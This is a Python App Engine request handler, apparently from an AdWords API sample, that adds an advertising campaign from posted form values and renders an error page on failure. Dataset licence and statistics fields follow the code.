from handlers.api_handler import APIHandler
from handlers.ndb_handler import InitUser
import webapp2
from google.appengine.api import users
from google.appengine.ext.webapp import template
class AddCampaign(webapp2.RequestHandler):
"""View that either adds a Campaign or displays an error message."""
def post(self):
"""Handle post request."""
client_customer_id = self.request.get('clientCustomerId')
campaign_name = self.request.get('campaignName')
ad_channel_type = self.request.get('adChannelType')
budget = self.request.get('budget')
template_values = {
'back_url': '/showCampaigns?clientCustomerId=%s' % client_customer_id,
'back_msg': 'View Campaigns',
'logout_url': users.create_logout_url('/'),
'user_nickname': users.get_current_user().nickname()
}
try:
app_user = InitUser()
# Load Client instance.
handler = APIHandler(app_user.client_id,
app_user.client_secret,
app_user.refresh_token,
app_user.adwords_manager_cid,
app_user.developer_token)
# Create new campaign.
handler.AddCampaign(client_customer_id, campaign_name,
ad_channel_type, budget)
self.redirect('/showCampaigns?clientCustomerId=%s' % client_customer_id)
except Exception as e:
template_values['error'] = str(e)
# Use template to write output to the page.
path = os.path.join(os.path.dirname(__file__),
'../templates/base_template.html')
self.response.out.write(template.render(path, template_values))
|
apache-2.0
| 375,887,224,737,519,740
| 35.507692
| 78
| 0.664981
| false
| 3.981544
| false
| false
| false
|